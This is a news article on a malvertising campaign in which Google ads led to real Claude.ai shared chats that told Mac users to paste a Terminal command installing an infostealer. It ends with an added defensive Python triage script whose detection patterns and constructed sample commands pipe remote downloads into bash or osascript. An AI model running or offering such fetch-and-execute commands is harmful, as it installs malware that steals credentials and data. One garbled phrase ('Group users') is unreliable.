The attackers hid the trap where users least expected one.

The attackers found an unusual way to turn users' trust in a familiar service against them. In the new campaign, malicious Google ads do not lead to a look-alike site but to the genuine Claude.ai domain. The danger sits one step further in: in publicly shared chats, where instructions dressed up as a guide to installing Claude Code for Mac get the computer's owner to start the infection themselves.
The fraudulent campaign was spotted by Trendyol Group security engineer Burke Albayrak. According to him, one of the public Claude.ai chats presented itself as an official "Apple Support" guide to installing Claude Code on macOS. The user was told to open Terminal and paste a command that, with no visible sign of it, downloaded and ran malicious code.
BleepingComputer, while checking the report, found another chat using the same scheme but a different infrastructure. In both cases users reached the pages through Google's sponsored search results for the query "Claude mac download". The ad displayed the real claude.ai address, so the usual domain check gave no hint of the threat.
In one variant of the attack, the command fetched a compressed shell script from a remote server; the script ran in memory and left almost no traces on disk. The server served a differently obfuscated version of the payload on every request, to frustrate checks based on file hashes or signatures.
The sample examined by BleepingComputer collected the external IP address, the host name and the macOS version, then sent that information to the attackers' server. Afterwards the script downloaded the next stage and ran it through osascript, the automation mechanism built into macOS. This approach gives remote command execution without installing a recognisable application or dropping a separate executable file.
The variant described by Burke Albayrak was more direct and went straight to data theft. The malware collected browser credentials, cookies and the contents of Keychain, then sent the archive to the operator's server. Albayrak linked the sample to the MacSync infostealer for macOS.
The scheme differs from typical malvertising in that the attackers do not even need to register a look-alike domain. The user sees the real Claude.ai address both before clicking the link and after it, yet lands in a shared chat containing dangerous instructions. A similar technique has previously been used against ChatGPT and Group users.
Anthropic offers the native Claude application for download directly from claude.ai, and the Claude Code CLI is installed according to the official documentation. Terminal commands that come from ad clicks or public chats deserve a separate check, even when the page looks legitimate.
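The article's advice is to check a pasted Terminal command before running it. The following is an added example, not code from the article or from Anthropic, that performs that check heuristically: it flags the traits the two variants above share (a remote download piped straight into an interpreter, a compressed or encoded stream executed in memory, osascript used to run a stage, downloads from a bare IP address). The sample commands, hostnames and IP addresses in it are constructed for illustration and are not indicators from the campaign.

```python
"""Heuristic triage for Terminal one-liners copied from web pages.

Added example (not from the original article). It looks only for the
structural traits described in the article, so a flag means "verify the
source against vendor documentation", not "this is malware": some
legitimate installers (Homebrew, for instance) use the subshell shape
flagged below. All sample commands here are constructed.
"""
import re
from typing import Dict, List

# A pipe whose right-hand side is a shell or script interpreter.
PIPE_TO_INTERP = r"\|\s*(sudo\s+)?(bash|zsh|ksh|sh|osascript|python3?|perl)\b"

# Each rule: (flag name, compiled regex). Deliberately broad.
RULES = [
    # curl/wget output fed directly into an interpreter (nothing touches disk)
    ("download-piped-to-interpreter",
     re.compile(r"\b(curl|wget)\b[^|;&]*" + PIPE_TO_INTERP)),
    # a compressed or encoded stream decoded and executed in memory
    ("decoded-stream-executed",
     re.compile(r"\b(base64\s+(-d|--decode|-D)|gunzip|zcat|xz\s+-d|gzip\s+-d)\b"
                r"[^|;&]*" + PIPE_TO_INTERP)),
    # eval "$(curl ...)" or bash -c "$(curl ...)": remote content becomes the script
    ("remote-content-in-subshell",
     re.compile(r"\b(eval|(ba|z)?sh\s+-c)\s+['\"]?\$\((curl|wget)\b")),
    # osascript as a stage runner, as in the sample BleepingComputer examined
    ("osascript-invoked",
     re.compile(r"\bosascript\b")),
    # download from a bare IPv4 address rather than a vendor hostname
    ("raw-ip-download",
     re.compile(r"\b(curl|wget)\b[^|;&]*https?://\d{1,3}(\.\d{1,3}){3}")),
]


def classify_command(cmd: str) -> List[str]:
    """Return the names of every rule the command matches, in RULES order.

    Whitespace (including line continuations and newlines) is collapsed
    first so a command split across several lines is judged as one.
    """
    flat = " ".join(cmd.split())
    return [name for name, rx in RULES if rx.search(flat)]


def is_suspicious(cmd: str) -> bool:
    """True if at least one rule matched."""
    return bool(classify_command(cmd))


def triage(commands: Dict[str, str]) -> Dict[str, List[str]]:
    """Classify a labelled batch of commands; returns label -> flags."""
    return {label: classify_command(cmd) for label, cmd in commands.items()}


# Constructed samples. IP addresses are from the TEST-NET documentation
# ranges; the hostname uses the reserved .invalid TLD.
SAMPLE_COMMANDS = {
    "benign-xcode": "xcode-select --install",
    "download-pipe": "curl -fsSL http://203.0.113.10/setup.sh | bash",
    "gzip-osascript": "curl -fsSL https://198.51.100.7/stage1.gz | gunzip | osascript -",
    "base64-sh": "echo aGVsbG8= | base64 -D | sh",
    "subshell-install": '/bin/bash -c "$(curl -fsSL https://example.invalid/install.sh)"',
}

if __name__ == "__main__":
    for label, flags in triage(SAMPLE_COMMANDS).items():
        verdict = "CHECK SOURCE" if flags else "no flags"
        print(f"{label:18} {verdict:12} {', '.join(flags)}")
```

The check is a triage aid to decide whether a command needs to be compared against the vendor's own documentation before it is run; the last sample shows why it is not a verdict, since the `bash -c "$(curl ...)"` shape is also how some legitimate projects publish their installers.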